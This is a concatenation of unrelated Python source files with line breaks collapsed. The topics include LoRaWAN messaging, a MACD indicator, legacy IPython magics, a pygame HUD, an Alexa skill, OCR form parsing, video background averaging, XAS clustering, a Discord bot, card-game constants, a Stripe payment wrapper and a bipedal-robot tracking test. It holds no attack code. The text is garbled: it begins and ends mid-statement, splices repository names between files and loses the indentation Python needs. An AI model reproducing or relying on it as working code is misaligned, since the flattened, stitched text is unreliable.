print(lorawan.get_mic()) # print(lorawan.compute_mic()) # print(lorawan.valid_mic()) # raw_payload = "".join(list(map(chr, lorawan.get_payload()))) # print(raw_payload) # print("\n") self.set_mode(MODE.SLEEP) self.reset_ptr_rx() self.set_mode(MODE.STDBY) def on_tx_done(self): self.set_mode(MODE.STDBY) self.clear_irq_flags(TxDone=1) if self.verbose: print("TxDone") self.set_mode(MODE.STDBY) if self.verbose: print("TxDone. Receiving LoRaWAN message\n") # set to "RX" self.set_dio_mapping([0] * 6) self.set_invert_iq(1) self.reset_ptr_rx() self.set_mode(MODE.RXCONT) print('check rx-state:') print(self.rx_is_good()) def send_tx(self, message): lorawan = LoRaWAN.new(self.nwkey, self.appkey) lorawan.create(MHDR.UNCONF_DATA_UP, {'devaddr': self.devaddr, 'fcnt': counter.get_current(), 'data': list(map(ord, message))}) self.write_payload(lorawan.to_raw()) self.set_mode(MODE.TX) # -*- coding: utf-8 -*- # MooQuant # # Copyright 2017 bopo.wang<> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. moduleauthor:: bopo.wang <> """ from mooquant import dataseries from mooquant.technical import ma class MACD(dataseries.SequenceDataSeries): """Moving Average Convergence-Divergence indicator as described in http://stockcharts.com/school/doku.php?id=chart_school:technical_indicators:moving_average_convergence_divergence_macd. :param dataSeries: The DataSeries instance being filtered. :type dataSeries: :class:`mooquant.dataseries.DataSeries`. :param fastEMA: The number of values to use to calculate the fast EMA. :type fastEMA: int. :param slowEMA: The number of values to use to calculate the slow EMA. :type slowEMA: int. :param signalEMA: The number of values to use to calculate the signal EMA. :type signalEMA: int. :param maxLen: The maximum number of values to hold. Once a bounded length is full, when new items are added, a corresponding number of items are discarded from the opposite end. If None then dataseries.DEFAULT_MAX_LEN is used. :type maxLen: int. """ def __init__(self, dataSeries, fastEMA, slowEMA, signalEMA, maxLen=None): assert (fastEMA > 0) assert (slowEMA > 0) assert (fastEMA < slowEMA) assert (signalEMA > 0) super().__init__(maxLen) # We need to skip some values when calculating the fast EMA in order for both EMA # to calculate their first values at the same time. # I'M FORCING THIS BEHAVIOUR ONLY TO MAKE THIS FITLER MATCH TA-Lib MACD VALUES. self.__fastEMASkip = slowEMA - fastEMA self.__fastEMAWindow = ma.EMAEventWindow(fastEMA) self.__slowEMAWindow = ma.EMAEventWindow(slowEMA) self.__signalEMAWindow = ma.EMAEventWindow(signalEMA) self.__signal = dataseries.SequenceDataSeries(maxLen) self.__histogram = dataseries.SequenceDataSeries(maxLen) dataSeries.getNewValueEvent().subscribe(self.__onNewValue) def getSignal(self): """Returns a :class:`mooquant.dataseries.DataSeries` with the EMA over the MACD.""" return self.__signal def getHistogram(self): """Returns a :class:`mooquant.dataseries.DataSeries` with the histogram (the difference between the MACD and the Signal).""" return self.__histogram def __onNewValue(self, dataSeries, dateTime, value): diff = None macdValue = None signalValue = None histogramValue = None # We need to skip some values when calculating the fast EMA in order for both EMA # to calculate their first values at the same time. # I'M FORCING THIS BEHAVIOUR ONLY TO MAKE THIS FITLER MATCH TA-Lib MACD VALUES. self.__slowEMAWindow.onNewValue(dateTime, value) if self.__fastEMASkip > 0: self.__fastEMASkip -= 1 else: self.__fastEMAWindow.onNewValue(dateTime, value) if self.__fastEMAWindow.windowFull(): diff = self.__fastEMAWindow.getValue() - self.__slowEMAWindow.getValue() # Make the first MACD value available as soon as the first signal value is available. # I'M FORCING THIS BEHAVIOUR ONLY TO MAKE THIS FITLER MATCH TA-Lib MACD VALUES. self.__signalEMAWindow.onNewValue(dateTime, diff) if self.__signalEMAWindow.windowFull(): macdValue = diff signalValue = self.__signalEMAWindow.getValue() histogramValue = macdValue - signalValue self.appendWithDateTime(dateTime, macdValue) self.__signal.appendWithDateTime(dateTime, signalValue) self.__histogram.appendWithDateTime(dateTime, histogramValue) """ Legacy stuff Various stuff that are there for historical / familiarity reasons. This is automatically imported by default profile, though not other profiles (e.g. 'sh' profile). Stuff that is considered obsolete / redundant is gradually moved here. """ from IPython.core import ipapi ip = ipapi.get() import os,sys from IPython.utils.genutils import * # use rehashx def magic_rehash(self, parameter_s = ''): """Update the alias table with all entries in $PATH. This version does no checks on execute permissions or whether the contents of $PATH are truly files (instead of directories or something else). For such a safer (but slower) version, use %rehashx.""" # This function (and rehashx) manipulate the alias_table directly # rather than calling magic_alias, for speed reasons. A rehash on a # typical Linux box involves several thousand entries, so efficiency # here is a top concern. path = filter(os.path.isdir,os.environ.get('PATH','').split(os.pathsep)) alias_table = self.shell.alias_table for pdir in path: for ff in os.listdir(pdir): # each entry in the alias table must be (N,name), where # N is the number of positional arguments of the alias. alias_table[ff] = (0,ff) # Make sure the alias table doesn't contain keywords or builtins self.shell.alias_table_validate() # Call again init_auto_alias() so we get 'rm -i' and other modified # aliases since %rehash will probably clobber them self.shell.init_auto_alias() ip.define_magic("rehash", magic_rehash) # Exit def magic_Quit(self, parameter_s=''): """Exit IPython without confirmation (like %Exit).""" self.shell.ask_exit() ip.define_magic("Quit", magic_Quit) # make it autocallable fn if you really need it def magic_p(self, parameter_s=''): """Just a short alias for Python's 'print'.""" exec 'print ' + parameter_s in self.shell.user_ns ip.define_magic("p", magic_p) import pygame from game_objects.player import Player from utils import settings class HeadsUpDisplay: """User Interface Heads up Display Draws the Stats and Weapon/Magic to the game screen """ def __init__(self) -> None: # General Info: self.display_surface = pygame.display.get_surface() self.font = pygame.font.Font(settings.UI_FONT, settings.UI_FONT_SIZE) # Bar Setup self.health_bar_rect = pygame.Rect(10,10,settings.HEALTH_BAR_WIDTH,settings.BAR_HEIGHT) self.energy_bar_rect = pygame.Rect(10,34,settings.ENERGY_BAR_WIDTH,settings.BAR_HEIGHT) # Weapon Graphics self.weapon_graphics = [] self.magic_graphics = [] self.__build_graphics_from_data_dict(settings.weapon_data, self.weapon_graphics) self.__build_graphics_from_data_dict(settings.magic_data, self.magic_graphics) def __build_graphics_from_data_dict(self, data:dict, append_to_list:list): """* Selects item graphic path from item data dict. * Insanities a pygame.image from the path * stores image in append to list Args: data (dict): The item data dictionary from the settings file append_to_list (list): list to append graphics file path to """ for item in data.values(): path = item['graphic'] img = pygame.image.load(path).convert_alpha() append_to_list.append(img) def __show_bar(self, cur_amount, max_amount, bg_rect:pygame.Rect, color): """Draw a Rect Bar to display stats Args: cur_amount (int): current stat amount max_amount (int): max stat amount bg_rect (pygame.Rect): instantiated background rect color (str): color code """ # Draw background pygame.draw.rect(self.display_surface, settings.UI_BG_COLOR, bg_rect) # convert stat to pixels ratio = cur_amount / max_amount cur_width = bg_rect.width * ratio cur_rect = bg_rect.copy() cur_rect.width = cur_width # Draw bar pygame.draw.rect(self.display_surface, color, cur_rect) # Draw border pygame.draw.rect(self.display_surface, settings.UI_BORDER_COLOR, bg_rect, 3) def __show_exp(self, exp): """Draw experience points to game screen Args: exp (int): experience points """ exp = str(int(exp)) exp_desc = f"EXP: {exp}" # build display text_surf = self.font.render(exp_desc, False, settings.TEXT_COLOR) x = self.display_surface.get_size()[0] - 20 y = self.display_surface.get_size()[1] - 20 text_rect = text_surf.get_rect(bottomright=(x,y)) # display on game screen # background pygame.draw.rect(self.display_surface,settings.UI_BG_COLOR, text_rect.inflate(20,20)) # contents self.display_surface.blit(text_surf, text_rect) # border pygame.draw.rect(self.display_surface,settings.UI_BORDER_COLOR, text_rect.inflate(20,20),3) def __selection_box(self, left, top, has_switched:bool): """Draw game item selection box Args: left (int): left position top (int): top position has_switched (bool): if player is switching Returns: pygame.Rect: Rect of the selection box created """ bg_rect = pygame.Rect(left, top, settings.ITEM_BOX_SIZE, settings.ITEM_BOX_SIZE) pygame.draw.rect(self.display_surface, settings.UI_BG_COLOR, bg_rect) if has_switched: pygame.draw.rect(self.display_surface, settings.UI_BORDER_COLOR_ACTIVE, bg_rect, 3) else: pygame.draw.rect(self.display_surface, settings.UI_BORDER_COLOR, bg_rect, 3) return bg_rect def __item_overlay(self, left:int, top:int, item_index:int, item_graphics:list ,has_switched:bool): """Draw the current item to the game screen Args: left (int): left position top (int): top position item_index (int): Current selected item index item_graphics (list): Item Graphic List has_switched (bool): Can Player Switch Itesm """ bg_rect = self.__selection_box(left,top, has_switched) surf = item_graphics[item_index] rect = surf.get_rect(center = bg_rect.center) self.display_surface.blit(surf, rect) def __show_level(self, level_nbr:int): desc = f'Level: {level_nbr}' # build display text_surf = self.font.render(desc, False, settings.TEXT_COLOR) x = self.display_surface.get_size()[0] * 0.5 y = self.display_surface.get_size()[1] *0.05 text_rect = text_surf.get_rect(center=(x,y)) # display on game screen # background pygame.draw.rect(self.display_surface,settings.UI_BG_COLOR, text_rect.inflate(20,20)) # contents self.display_surface.blit(text_surf, text_rect) # border pygame.draw.rect(self.display_surface,settings.UI_BORDER_COLOR, text_rect.inflate(20,20),3) def display(self, player:Player, level_nbr:int): """Draw UI Items to the Game Screen Args: player (Player): Insanitated Player Object """ self.__show_bar(player.health,player.stats['health'],self.health_bar_rect, settings.HEALTH_COLOR) self.__show_bar(player.energy,player.stats['energy'],self.energy_bar_rect, settings.ENERGY_COLOR) self.__show_exp(player.exp) self.__show_level(level_nbr) # Weapon Overlay self.__item_overlay(10,630, player.weapon_index,self.weapon_graphics,not player.can_switch_weapon) # Magic Overlay self.__item_overlay(90,630, player.magic_index,self.magic_graphics,not player.can_switch_magic) from robot.api.deco import not_keyword class HybridWithNotKeywordDecorator(object): def get_keyword_names(self): return ['exposed_in_hybrid', 'not_exposed_in_hybrid'] def exposed_in_hybrid(self): pass @not_keyword def not_exposed_in_hybrid(self): pass skill.py """Alexa Skill to harness the power of the Giant Bomb API.""" import sys import logging from flask import Flask, render_template from flask_ask import Ask, statement, question, session from gb import api app = Flask(__name__) ask = Ask(app, '/') logging.getLogger('flask_ask').setLevel(logging.DEBUG) giant_bomb = api.GBApi() @ask.launch def launch(): """Start the skill.""" greeting_text = render_template('greeting') reprompt_text = render_template('reprompt') return question(greeting_text).reprompt(reprompt_text) @ask.intent('GetAnswerIntent', mapping={'title': 'Title'}, default={'title': ''}) def answer(title): """The default intent to be triggered. Uses the title to search the GB API. :param title: the title to search in the wiki database :returns: a `flask-ask.statement` result with the given template text """ if not title: nothing_text = render_template('nothing') return question(nothing_text) lookup = giant_bomb.whatis(title) print("Lookup: {}".format(lookup)) if lookup.match: found_text = render_template('found', name=lookup.name, release=lookup.release_human, deck=lookup.deck) return statement(found_text) notfound_text = render_template('notfound', name=title) more_text = render_template('more') return statement(notfound_text) @ask.intent('AMAZON.HelpIntent') def help(): """Give the user the help text.""" help_text = render_template('reprompt') return question(help_text).reprompt(help_text) @ask.intent('AMAZON.StopIntent') def stop(): """Allow the user to stop interacting.""" return statement("Goodbye") @ask.intent('AMAZON.CancelIntent') def cancel(): """Allow the user to cancel the interaction.""" return statement("Goodbye") @ask.session_ended def session_ended(): """End the session gracefully.""" return "", 200 def main(): """Utility method to run the app if outside of lambda.""" app.run() if __name__ == '__main__': main()sheensantoscapadngan/instafill import cv2 import json import math def onMouse(event, x, y, flags, param): if event == cv2.EVENT_LBUTTONDOWN: print('('+str(x)+','+str(y)+')') def format_field_name(word_with_spaces): word_with_spaces = ''.join( e for e in word_with_spaces if (e.isalnum() or e.isspace())) word_with_spaces = ' '.join(word_with_spaces.split()) word_with_spaces = word_with_spaces.lower() word_with_spaces = word_with_spaces.strip() return word_with_spaces def format_word(word): word = ''.join( e for e in word if (e.isalnum() or e.isspace())) word = word.lower() word = word.strip() return word def extract_ext_details(ext): try: pipe_split = ext.split('|') comma_split = pipe_split[1].split(',') word_value = format_word(pipe_split[0]) return word_value, comma_split except: return None, None def is_connected(current_pos, candidate_pos): vertical_thresh = 5 horizontal_thresh = 15 if len(current_pos) < 8 or len(candidate_pos) < 8: return False # current pos bot_right = (float(current_pos[4]), float(current_pos[5])) # candidate pos bot_left = (float(candidate_pos[6]), float(candidate_pos[7])) horizontal_diff = abs(bot_left[0]-bot_right[0]) vertical_diff = abs(bot_left[1]-bot_right[1]) if horizontal_diff < horizontal_thresh and vertical_diff < vertical_thresh: return True else: return False def extract_words_and_positions(response): result = "" for text in response[1:]: field_name = text.description result += field_name + '|' for i, vertex in enumerate(text.bounding_poly.vertices): result += str(vertex.x) + ',' + str(vertex.y) if i != len(text.bounding_poly.vertices) - 1: result += ',' result += '\n' return result def get_final_pos(start_pos, end_pos): pos = {} pos['top_left'] = (int(start_pos[0]), int(start_pos[1])) pos['bot_left'] = (int(start_pos[6]), int(start_pos[7])) pos['top_right'] = (int(end_pos[2]), int(end_pos[3])) pos['bot_right'] = (int(end_pos[4]), int(end_pos[5])) return pos def display_field_boxes(fields, img): for field, positions in fields.items(): for label, position in positions.items(): img = cv2.circle(img, position, radius=1, color=(0, 0, 255), thickness=-1) cv2.imshow("res", img) cv2.waitKey(0) def extract_coords_from_img(response, page): fields = {} words_and_positions = extract_words_and_positions(response) used_fields = set() repeat_count = 0 ind = 0 ext_data_list = words_and_positions.split('\n') while ind < len(ext_data_list): current_word, current_pos = extract_ext_details(ext_data_list[ind]) start_pos = current_pos ind += 1 while ind < len(ext_data_list): candidate_line = ext_data_list[ind] candidate_word, candidate_pos = extract_ext_details(candidate_line) if candidate_word is None: break if is_connected(current_pos, candidate_pos): current_word += ' ' + candidate_word current_pos = candidate_pos ind += 1 else: break if current_word is None: continue if any(c for c in current_word if c.isalnum()): final_pos = get_final_pos(start_pos, current_pos) if current_word not in used_fields: fields[current_word] = final_pos used_fields.add(current_word) else: current_repeat_val = "*_" + str(repeat_count) repeat_count += 1 fields[current_repeat_val] = final_pos return fields # 功能:通过帧数截取视频中感兴趣片段、对感兴趣片段进行求平均得到背景图 import cv2 import numpy as np # 定义函数,对原始视频进行裁剪 # 输入: # capture: 已经读取的视频 # begin: 起始帧数 # end: 终止帧数 # 输出: # 在文件夹中存储截取后的视频,保存名称为videoCut.avi,帧数和分辨率保持原始视频规格 def videoCut(capture, begin, end): # 获取视频信息 fps = capture.get(cv2.CAP_PROP_FPS) size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))) # 从原始视频中截取关键部分段 out = cv2.VideoWriter('videoCut.avi', cv2.VideoWriter_fourcc(*'XVID'), fps, size) i = 0 success, frame = capture.read() while success: success, frame = capture.read() if success: i += 1 if (i > begin and i < end): # 截取起始帧到终止帧之间的视频 out.write(frame) else: print('end') break # 定义函数,对截取视频进行求平均,得到背景 # 输入: # capture: 已经读取的视频 # 输出: # 在文件夹中存储求得平均后的背景图像,保存的名称为resultImage.jpg def meanBackground(capture): # 获取视频长度 frameNum = capture.get(cv2.CAP_PROP_FRAME_COUNT) success, frame = capture.read() # 初始化平均背景图像,初始化图像为视频首帧图像 meanFrame = frame # 在后续处理中为了防止数值溢出,先进行数据类型转化,转为float32型,在处理完成后在转化为unint8格式进行保存 meanFrame = meanFrame.astype(np.float32) cv2.imshow('original image', meanFrame) while True: # Capture frame-by-frame ret, frame = capture.read() if ret == True: tempframe = frame tempframe = tempframe.astype(np.float32) # 将所有帧的图像进行叠加 cv2.accumulate(tempframe, meanFrame) cv2.imshow('original video', frame) cv2.imshow('temp frame', tempframe) cv2.imshow('mean video', meanFrame) # Press Q on keyboard to exit if cv2.waitKey(33) & 0xFF == ord('q'): break # Break the loop else: break # cv2.imshow('accumulate image', meanFrame) # cv2.waitKey(0) meanFrame = meanFrame / frameNum # 对叠加后的图像进行求平均 meanFrame = meanFrame.astype(np.uint8) # 从float32转为uint8格式 cv2.imshow('result image', meanFrame) cv2.waitKey(300) cv2.imwrite('resultImage.jpg', meanFrame) # 读取原始视频文件 capture = cv2.VideoCapture('video1.mp4') if not capture.isOpened: print('Unable to open: ' + capture.input) exit(0) # 截取视频 videoCut(capture, 10, 500) # 读取截取后的视频 capture = cv2.VideoCapture('videoCut.avi') # 通过截取视频,使用平均值法求背景 meanBackground(capture) # 处理完毕,释放内存 capture.release() #!/usr/bin/python # -*- coding: utf-8 -*- """ The :mod:`~araucaria.stats.cluster` module offers the following functions to perform clustering: .. list-table:: :widths: auto :header-rows: 1 * - Function - Description * - :func:`cluster` - Performs hierarchical clustering on a collection. """ from typing import List, Tuple from numpy import inf from scipy.cluster.hierarchy import linkage from .. import Dataset, Collection from ..xas.xasutils import get_mapped_data def cluster(collection: Collection, taglist: List[str]=['all'], cluster_region: str='xanes', cluster_range: list=[-inf,inf], method: str='single', metric: str='euclidean', kweight: int=2) -> Dataset: """Performs hierarchical clustering on a collection. Parameters ---------- collection Collection with the groups for clustering. taglist List with keys to filter groups based on their ``tags`` attributes in the Collection. The default is ['all']. cluster_region XAFS region to perform clustering. Accepted values are 'dxanes', 'xanes', or 'exafs'. The default is 'xanes'. cluster_range Domain range in absolute values. Energy units are expected for 'dxanes' or 'xanes', while wavenumber (k) units are expected for 'exafs'. The default is [-:data:`~numpy.inf`, :data:`~numpy.inf`]. method Likage method to compute the distance between clusters. See the :func:`~scipy.cluster.hierarchy.linkage` function of ``scipy`` for a list of valid method names. The default is 'single'. metric The distance metric. See the :func:`~scipy.spatial.distance.pdist` function of ``scipy`` for a list of valid distance metrics. The default is 'euclidean'. kweight Exponent for weighting chi(k) by k^kweight. Only valid for ``cluster_region='exafs'``. The default is 2. Returns ------- : Dataset with the following arguments: - ``Z`` : hierarchical clustering encoded as a linkage matrix. - ``groupnames`` : list with names of clustered groups. - ``energy`` : array with energy values. Returned only if ``cluster_region='xanes`` or ``cluster_region=dxanes``. - ``k`` : array with wavenumber values. Returned only if ``cluster_region='exafs'``. - ``matrix`` : array with observed values for groups in ``cluster_range``. - ``cluster_pars`` : dictionary with cluster parameters. See also -------- :func:`~araucaria.plot.fig_cluster.fig_cluster` : Plots the dendrogram of a hierarchical clustering. Examples -------- >>> from araucaria.testdata import get_testpath >>> from araucaria import Dataset >>> from araucaria.xas import pre_edge, autobk >>> from araucaria.stats import cluster >>> from araucaria.io import read_collection_hdf5 >>> from araucaria.utils import check_objattrs >>> fpath = get_testpath('Fe_database.h5') >>> collection = read_collection_hdf5(fpath) >>> collection.apply(pre_edge) >>> out = cluster(collection, cluster_region='xanes') >>> attrs = ['groupnames', 'energy', 'matrix', 'Z', 'cluster_pars'] >>> check_objattrs(out, Dataset, attrs) [True, True, True, True, True] >>> # exafs clustering >>> collection.apply(autobk) >>> out = cluster(collection, cluster_region='exafs', cluster_range=[0,10]) >>> attrs = ['groupnames', 'k', 'matrix', 'Z', 'cluster_pars'] >>> check_objattrs(out, Dataset, attrs) [True, True, True, True, True] """ xvals, matrix = get_mapped_data(collection, taglist=taglist, region=cluster_region, range=cluster_range, kweight=kweight) # linkage matrix # matrix is transposed to follow the m by n convention with m observation vectors Z = linkage(matrix.T, method=method, metric=metric) # storing cluster parameters cluster_pars = {'cluster_region': cluster_region, 'cluster_range' : cluster_range, 'method' : method, 'metric' : metric,} # additional cluster parameters if cluster_region == 'exafs': xvar = 'k' # x-variable cluster_pars['kweight'] = kweight else: # xanes/dxanes clustering xvar = 'energy' # x-variable # storing cluster results content = {'groupnames' : collection.get_names(taglist=taglist), xvar : xvals, 'matrix' : matrix, 'Z' : Z, 'cluster_pars' : cluster_pars,} out = Dataset(**content) return out if __name__ == '__main__': import doctest doctest.testmod()0 """ entry point for `the void` """ import json import logging import asyncio import traceback from typing import TYPE_CHECKING, Optional, List, Dict, Union import asyncpg import discord from discord.ext import commands import db from bot import VBot logging.basicConfig(level=logging.INFO, format="[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s") log = logging.getLogger(__name__) bot = VBot(command_prefix=["v;", "V;"], description="A bot that consumes all messages.", owner_id=389590659335716867, case_insensitive=True) @bot.event async def on_ready(): log.info('Connected using discord.py version {}!'.format(discord.__version__)) log.info('Username: {0.name}, ID: {0.id}'.format(bot.user)) log.info("Connected to {} servers.".format(len(bot.guilds))) log.info('------') log.warning("thevoid is fully loaded.") # ---- Command Error Handling ----- # @bot.event async def on_command_error(ctx, error): # https://gist.github.com/EvieePy/7822af90858ef65012ea500bcecf1612 # This prevents any commands with local handlers being handled here in on_command_error. if hasattr(ctx.command, 'on_error'): return if type(error) == discord.ext.commands.NoPrivateMessage: await ctx.send("⚠ This command can not be used in DMs!!!") return elif type(error) == discord.ext.commands.CommandNotFound: await ctx.send("⚠ Invalid Command!!!") return elif type(error) == discord.ext.commands.MissingPermissions: await ctx.send("⚠ You need the **Manage Messages** permission to use this command".format(error.missing_perms)) return elif type(error) == discord.ext.commands.MissingRequiredArgument: await ctx.send("⚠ {}".format(error)) elif type(error) == discord.ext.commands.BadArgument: await ctx.send("⚠ {}".format(error)) elif isinstance(error, commands.CommandOnCooldown): await ctx.send("⚠ {}".format(error)) else: await ctx.send("⚠ {}".format(error)) raise error @bot.event async def on_error(event_name, *args): log.exception("Exception from event {}".format(event_name)) if 'error_log_channel' not in config: return error_log_channel = bot.get_channel(config['error_log_channel']) embed = None # Determine if we can get more info, otherwise post without embed # if args and type(args[0]) == discord.Message: # message: discord.Message = args[0] # embeds.exception_w_message(message) # elif args and type(args[0]) == discord.RawMessageUpdateEvent: # logging.error("After Content:{}.".format(args[0].data['content'])) # if args[0].cached_message is not None: # logging.error("Before Content:{}.".format(args[0].cached_message.content)) # Todo: Add more traceback_message = "```python\n{}```".format(traceback.format_exc()) traceback_message = (traceback_message[:1993] + ' ...```') if len(traceback_message) > 2000 else traceback_message await error_log_channel.send(content=traceback_message, embed=embed) if __name__ == '__main__': with open('config.json') as json_data_file: config = json.load(json_data_file) log.info(f"Connecting to DB @: {config['db_uri']}") db_pool: asyncpg.pool.Pool = asyncio.get_event_loop().run_until_complete(db.create_db_pool(config['db_uri'])) asyncio.get_event_loop().run_until_complete(db.create_tables(db_pool)) bot.config = config bot.db_pool = db_pool bot.load_cogs() bot.run(config['token']) log.info("cleaning Up and shutting down") loveletter/card.py # -*- coding: utf-8 -*- """ Love Letter Card tools Functions and constants to facilitate working with cards, which are represented as integers. """ import numpy as np class Card(): """Static Card class""" noCard = 0 guard = 1 priest = 2 baron = 3 handmaid = 4 prince = 5 king = 6 countess = 7 princess = 8 # 0 1 2 3 names = ['', 'Guard', 'Priest', 'Baron', # 4 5 6 7 8 'Handmaid', 'Prince', 'King', 'Countess', 'Princess'] # 0 1 2 3 4 5 6 7 8 symbols = ['☁️', '⚔️', '🕌', '🎲', '🛡️', '⚜️', '👑', '👸', '❤️'] descriptions = ['None', # None 'Guess a player\'s hand', # Guard 'Look at a hand', # Priest 'Compare hands; lower hand is out.', # Baron 'Protection until your next turn', # Handmaid 'One player discards their hand', # Prince 'Trade hands with target player', # King 'Discard if caught with King or Prince', # Countess 'Lose if discarded'] # Princess counts = [5, # Guard 2, # Priest 2, # Baron 2, # Handmaid 2, # Prince 1, # King 1, # Countess 1] # Princess only_self = [4, 7, 8] only_other = [1, 2, 3, 6] @staticmethod def render_card_number(card): """Render a card name with padded length""" numbered_names = ["{} {} ({})".format(name, symbol, idx) for idx, (name, symbol) in enumerate(zip(Card.names, Card.symbols))] max_length = max([len(i) for i in numbered_names]) str_base = "{0: >" + str(max_length) + "}" return str_base.format(numbered_names[card]) @staticmethod def shuffle_deck(seed=451): """A numpy array of shuffled cards""" deck = [] for card_number, card_count in enumerate(Card.counts): card_id = card_number + 1 deck = deck + [card_id] * card_count deck_np = np.array(deck) np.random.seed(seed=seed) np.random.shuffle(deck_np) return deck_np mutouxia/kamiFaka import stripe class Stripe(object): def __init__(self,payment='wechat'): from service.util.pay.pay_config import get_config if payment == 'wechat': self.types = 'wechat' config = get_config('Stripe微信') else: self.types = 'alipay' config = get_config('Stripe支付宝') self.key = config['key'] # sk_开头密钥 self.currency= config['currency'] # 美元或人名币 self.web_url = get_config('web_url') self.return_url = self.web_url+'/notify/stripe' def create_order(self,name,out_trade_no,total_price): try: res = stripe.Source.create( type=self.types, # 或alipay currency=self.currency, # 货币单位 redirect={ 'return_url': self.return_url }, amount=int(total_price*100), #最低4元起步 api_key=self.key ) data = res.to_dict_recursive() print(data) # 返回url值,数据库存储secret值 if self.types == 'wechat': # 不清楚是否可直接扫码 qr_code = data['wechat']['qr_code_url'] else: qr_code = data['redirect']['url'] return {'qr_code':qr_code,'redirect':1,'signs':data['id']+data['client_secret']} # 第三方状态1;本地2 except Exception as e: print(e) return None # def verify(self,data): #异步通知 # 没有异步校验,仅仅比对数据库里的三个参数即可 # try: # data['source'] # 根据此查询数据==》获取之前存储的client # if data['client_secret'] == 数据库client_secret: # return True # except Exception as e: # print(e) # return False WooQi57/cassie-runtools/aslip_tests/taskspace_tracking.py """ Measures the taskspace tracking error for aslip policies individually for each speed the policy accepts """ import os, sys, argparse sys.path.append("../..") from cassie import CassieEnv, CassiePlayground from rl.policies.actor import GaussianMLP_Actor import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D import pickle import numpy as np import torch import time def set_axes_equal(ax): '''Make axes of 3D plot have equal scale so that spheres appear as spheres, cubes as cubes, etc.. This is one possible solution to Matplotlib's ax.set_aspect('equal') and ax.axis('equal') not working for 3D. Input ax: a matplotlib axis, e.g., as output from plt.gca(). ''' x_limits = ax.get_xlim3d() y_limits = ax.get_ylim3d() z_limits = ax.get_zlim3d() x_range = abs(x_limits[1] - x_limits[0]) x_middle = np.mean(x_limits) y_range = abs(y_limits[1] - y_limits[0]) y_middle = np.mean(y_limits) z_range = abs(z_limits[1] - z_limits[0]) z_middle = np.mean(z_limits) # The plot bounding box is a sphere in the sense of the infinity # norm, hence I call half the max range the plot radius. plot_radius = 0.5*max([x_range, y_range, z_range]) ax.set_xlim3d([x_middle - plot_radius, x_middle + plot_radius]) ax.set_ylim3d([y_middle - plot_radius, y_middle + plot_radius]) ax.set_zlim3d([z_middle - plot_radius, z_middle + plot_radius]) def eval_policy(policy, args, run_args, testing_speed): max_traj_len = args.traj_len + args.ramp_up visualize = args.viz # run_args.dyn_random = True env = CassieEnv(traj="aslip", state_est=run_args.state_est, no_delta=run_args.no_delta, learn_gains=run_args.learn_gains, ik_baseline=run_args.ik_baseline, dynamics_randomization=run_args.dyn_random, clock_based=run_args.clock_based, reward="aslip_old", history=run_args.history) if args.debug: env.debug = True print(env.reward_func) if hasattr(policy, 'init_hidden_state'): policy.init_hidden_state() orient_add = 0 if visualize: env.render() render_state = True state = env.reset_for_test() done = False timesteps = 0 eval_reward = 0 # Data to track time_log = [] # time in seconds traj_info = [] # Information from reference trajectory library actual_state_info = [] # actual mujoco state of the robot l_footstep = [] # (time, left foot desired placement, left foot actual placement) r_footstep = [] # (time, right foot desired placement, right foot actual placement) # footstep = [] env.update_speed(testing_speed) print(env.speed) while timesteps < max_traj_len: if hasattr(env, 'simrate'): start = time.time() # if (not env.vis.ispaused()): # Update Orientation env.orient_add = orient_add # quaternion = euler2quat(z=orient_add, y=0, x=0) # iquaternion = inverse_quaternion(quaternion) # # TODO: Should probably not assume these indices. Should make them not hard coded # if env.state_est: # curr_orient = state[1:5] # curr_transvel = state[15:18] # else: # curr_orient = state[2:6] # curr_transvel = state[20:23] # new_orient = quaternion_product(iquaternion, curr_orient) # if new_orient[0] < 0: # new_orient = -new_orient # new_translationalVelocity = rotate_by_quaternion(curr_transvel, iquaternion) # if env.state_est: # state[1:5] = torch.FloatTensor(new_orient) # state[15:18] = torch.FloatTensor(new_translationalVelocity) # # state[0] = 1 # For use with StateEst. Replicate hack that height is always set to one on hardware. # else: # state[2:6] = torch.FloatTensor(new_orient) # state[20:23] = torch.FloatTensor(new_translationalVelocity) action = policy.forward(torch.Tensor(state), deterministic=True).detach().numpy() state, reward, done, _ = env.step(action) # if timesteps > args.ramp_up: # print(env.counter) a, _, _, d = env.get_traj_and_state_info() traj_info.append(a) actual_state_info.append(d) time_log.append(timesteps / 40) if a[1][2] == 0.0: l_footstep.append(np.linalg.norm(a[1] - d[1])) elif a[2][2] == 0.0: r_footstep.append(np.linalg.norm(a[2] - d[2])) # if traj_info[] # if env.lfoot_vel[2] < -0.6: # print("left foot z vel over 0.6: ", env.lfoot_vel[2]) # if env.rfoot_vel[2] < -0.6: # print("right foot z vel over 0.6: ", env.rfoot_vel[2]) eval_reward += reward timesteps += 1 qvel = env.sim.qvel() # print("actual speed: ", np.linalg.norm(qvel[0:2])) # print("commanded speed: ", env.speed) if visualize: render_state = env.render() # if hasattr(env, 'simrate'): # # assume 40hz # end = time.time() # delaytime = max(0, 1000 / 40000 - (end-start)) # time.sleep(delaytime) actual_state_info = actual_state_info[:-1] traj_info = traj_info[:-1] time_log = time_log[:-1] print("Eval reward: ", eval_reward) traj_info = np.array(traj_info) actual_state_info = np.array(actual_state_info) time_log = np.array(time_log) fig = plt.figure(figsize=(10,10)) ax = fig.add_subplot(111, projection='3d') ax.set_title("Taskspace tracking performance : {} m/s (simulation)".format(testing_speed)) ax.plot(traj_info[:,0,0], traj_info[:,0,1], traj_info[:,0,2], label='ROM', c='g') ax.plot(traj_info[:,1,0], traj_info[:,1,1], traj_info[:,1,2], c='g') ax.plot(traj_info[:,2,0], traj_info[:,2,1], traj_info[:,2,2], c='g') ax.plot(actual_state_info[:,0,0], actual_state_info[:,0,1], actual_state_info[:,0,2], label='robot', c='r') ax.plot(actual_state_info[:,1,0], actual_state_info[:,1,1], actual_state_info[:,1,2], c='r') ax.plot(actual_state_info[:,2,0], actual_state_info[:,2,1], actual_state_info[:,2,2], c='r') set_axes_equal(ax) plt.legend() plt.tight_layout() plt.savefig("./plots/taskspace{}.png".format(testing_speed)) traj_info = 